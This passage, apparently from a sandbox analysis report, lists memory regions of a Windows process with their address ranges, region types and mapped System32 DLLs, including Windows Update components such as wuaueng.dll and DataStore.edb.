mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1277 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1278 start_va = 0x7fefd590000 end_va = 0x7fefd5c1fff entry_point = 0x7fefd590000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1279 start_va = 0x7fefd5e0000 end_va = 0x7fefd5e9fff entry_point = 0x7fefd5e0000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1280 start_va = 0x7fefd670000 end_va = 0x7fefd69efff entry_point = 0x7fefd670000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1281 start_va = 0x7fefd6b0000 end_va = 0x7fefd71cfff entry_point = 0x7fefd6b0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1282 start_va = 0x7fefd720000 end_va = 0x7fefd733fff entry_point = 0x7fefd720000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1283 start_va = 0x7fefd980000 end_va = 0x7fefd9a2fff entry_point = 0x7fefd980000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1284 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1285 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1286 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1287 start_va = 0x7fefda90000 end_va = 0x7fefdb20fff entry_point = 0x7fefda90000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1288 start_va = 0x7fefdb30000 end_va = 0x7fefdb6cfff entry_point = 0x7fefdb30000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1289 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1290 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1291 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1292 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1293 start_va = 0x7fefdd20000 end_va = 0x7fefdd59fff entry_point = 0x7fefdd20000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1294 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1295 start_va = 0x7fefddd0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddd0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1296 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1297 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1298 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1299 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1300 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1301 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1302 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1303 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1304 start_va = 0x7feff2f0000 end_va = 0x7feff4c6fff entry_point = 0x7feff2f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1305 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1306 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1307 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1308 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1309 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1310 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1311 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1312 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1313 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1314 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1315 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1316 start_va = 0x7fffff56000 end_va = 0x7fffff57fff entry_point = 0x0 region_type = private name = "private_0x000007fffff56000" filename = "" Region: id = 1317 start_va = 0x7fffff58000 end_va = 0x7fffff59fff entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 1318 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 1319 start_va = 0x7fffff60000 end_va = 0x7fffff61fff entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 1320 start_va = 0x7fffff66000 end_va = 0x7fffff67fff entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 1321 start_va = 0x7fffff68000 end_va = 0x7fffff69fff entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 1322 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 1323 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 1324 start_va = 0x7fffff70000 end_va = 0x7fffff71fff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 1325 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 1326 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 1327 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 1328 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 1329 start_va = 0x7fffff80000 end_va = 0x7fffff81fff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 1330 start_va = 0x7fffff82000 end_va = 0x7fffff83fff entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 1331 start_va = 0x7fffff84000 end_va = 0x7fffff85fff entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1332 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 1333 start_va = 0x7fffff88000 end_va = 0x7fffff89fff entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 1334 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 1335 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 1336 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1337 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 1338 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1339 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1340 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1341 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1342 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1343 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1344 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1345 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1346 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1347 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1348 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1349 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1350 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1351 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1352 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1353 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1354 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1355 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1356 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1357 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1358 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1359 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1360 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 1362 start_va = 0x24b0000 end_va = 0x252ffff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 1363 start_va = 0x37e0000 end_va = 0x385ffff entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 1364 start_va = 0x3b00000 end_va = 0x3b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 1365 start_va = 0x40e0000 end_va = 0x415ffff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 1366 start_va = 0x42b0000 end_va = 0x432ffff entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 1367 start_va = 0x4470000 end_va = 0x44effff entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 1368 start_va = 0x4810000 end_va = 0x488ffff entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 1369 start_va = 0x4900000 end_va = 0x497ffff entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 1370 start_va = 0x4be0000 end_va = 0x4c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004be0000" filename = "" Region: id = 1371 start_va = 0x7fedd130000 end_va = 0x7fedd13efff entry_point = 0x7fedd130000 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 1372 start_va = 0x7fedd140000 end_va = 0x7fedd392fff entry_point = 0x7fedd140000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1373 start_va = 0x7feddfe0000 end_va = 0x7fede259fff entry_point = 0x7feddfe0000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1374 start_va = 0x7fef54d0000 end_va = 0x7fef5540fff entry_point = 0x7fef54d0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1375 start_va = 0x7fef7de0000 end_va = 0x7fef7dfafff entry_point = 0x7fef7de0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1376 start_va = 0x7fffff54000 end_va = 0x7fffff55fff entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 1377 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 1378 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 1379 start_va = 0x7fffff62000 end_va = 0x7fffff63fff entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 1380 start_va = 0x7fffff64000 end_va = 0x7fffff65fff entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 1381 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 1382 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 1383 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 1384 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 1385 start_va = 0x1d30000 end_va = 0x1d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 1386 start_va = 0x24d0000 end_va = 0x254ffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1387 start_va = 0x4c60000 end_va = 0x4d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c60000" filename = "" Region: id = 1388 start_va = 0x4df0000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 1389 start_va = 0x77e00000 end_va = 0x77e06fff entry_point = 0x77e00000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1390 start_va = 0x7fefd5d0000 end_va = 0x7fefd5d7fff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1391 start_va = 0x7fffff52000 end_va = 0x7fffff53fff entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 1392 start_va = 0x7fedd120000 end_va = 0x7fedd12cfff entry_point = 0x7fedd120000 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 2057 start_va = 0xe00000 end_va = 0xe19fff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 2058 start_va = 0xe20000 end_va = 0xe20fff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 2059 start_va = 0xe30000 end_va = 0xe30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e30000" filename = "" Region: id = 2060 start_va = 0xec0000 end_va = 0xec7fff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 2061 start_va = 0xfd0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 2062 start_va = 0xfe0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 2063 start_va = 0xff0000 end_va = 0xffffff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 2064 start_va = 0x1000000 end_va = 0x1000fff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 2065 start_va = 0x1020000 end_va = 0x1021fff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2066 start_va = 0x1030000 end_va = 0x1030fff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 2067 start_va = 0x1040000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 2068 start_va = 0x1050000 end_va = 0x1057fff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 2069 start_va = 0x13b0000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 2070 start_va = 0x13c0000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 2071 start_va = 0x14d0000 end_va = 0x14dffff entry_point = 0x14d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2072 start_va = 0x14e0000 end_va = 0x14effff entry_point = 0x14e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2073 start_va = 0x14f0000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 2074 start_va = 0x1500000 end_va = 0x1507fff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 2075 start_va = 0x1510000 end_va = 0x151ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 2076 start_va = 0x16a0000 end_va = 0x16affff entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 2077 start_va = 0x16b0000 end_va = 0x16b7fff entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 2078 start_va = 0x16c0000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 2079 start_va = 0x1920000 end_va = 0x199ffff entry_point = 0x0 region_type = private name = "private_0x0000000001920000" filename = "" Region: id = 2080 start_va = 0x1dc0000 end_va = 0x1dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001dc0000" filename = "" Region: id = 2081 start_va = 0x1dd0000 end_va = 0x1ddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001dd0000" filename = "" Region: id = 2082 start_va = 0x1de0000 end_va = 0x1deffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001de0000" filename = "" Region: id = 2083 start_va = 0x1df0000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001df0000" filename = "" Region: id = 2084 start_va = 0x1e00000 end_va = 0x1e0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 2085 start_va = 0x1e10000 end_va = 0x1e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e10000" filename = "" Region: id = 2086 start_va = 0x2470000 end_va = 0x247ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002470000" filename = "" Region: id = 2087 start_va = 0x2480000 end_va = 0x248ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 2088 start_va = 0x2490000 end_va = 0x249ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002490000" filename = "" Region: id = 2089 start_va = 0x24a0000 end_va = 0x24affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024a0000" filename = "" Region: id = 2090 start_va = 0x24b0000 end_va = 0x24bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 2091 start_va = 0x24c0000 end_va = 0x24cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024c0000" filename = "" Region: id = 2092 start_va = 0x26b0000 end_va = 0x276ffff entry_point = 0x26b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2093 start_va = 0x2b10000 end_va = 0x2b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 2094 start_va = 0x2d50000 end_va = 0x2d8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d50000" filename = "" Region: id = 2095 start_va = 0x2d90000 end_va = 0x2dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d90000" filename = "" Region: id = 2096 start_va = 0x4e70000 end_va = 0x4f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 2097 start_va = 0x4f70000 end_va = 0x506ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 2098 start_va = 0x5070000 end_va = 0x516ffff entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 2099 start_va = 0x5170000 end_va = 0x526ffff entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 2100 start_va = 0x5270000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005270000" filename = "" Region: id = 2101 start_va = 0x5370000 end_va = 0x53effff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 2102 start_va = 0x53f0000 end_va = 0x54effff entry_point = 0x0 region_type = private name = "private_0x00000000053f0000" filename = "" Region: id = 2103 start_va = 0x54f0000 end_va = 0x64effff entry_point = 0x0 region_type = private name = "private_0x00000000054f0000" filename = "" Region: id = 2104 start_va = 0x64f0000 end_va = 0x164effff entry_point = 0x0 region_type = private name = "private_0x00000000064f0000" filename = "" Region: id = 2105 start_va = 0x7fef90f0000 end_va = 0x7fef9104fff entry_point = 0x7fef90f0000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 2106 start_va = 0x7fffff50000 end_va = 0x7fffff51fff entry_point = 0x0 region_type = private name = "private_0x000007fffff50000" filename = "" Region: id = 3585 start_va = 0x3610000 end_va = 0x368ffff entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 3586 start_va = 0x7fee2ed0000 end_va = 0x7fee30a3fff entry_point = 0x7fee2ed0000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 3587 start_va = 0xed0000 end_va = 0xed0fff entry_point = 0xed0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 3588 start_va = 0xee0000 end_va = 0xefffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 3589 start_va = 0x1940000 end_va = 0x19bffff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 3590 start_va = 0x3110000 end_va = 0x318ffff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" 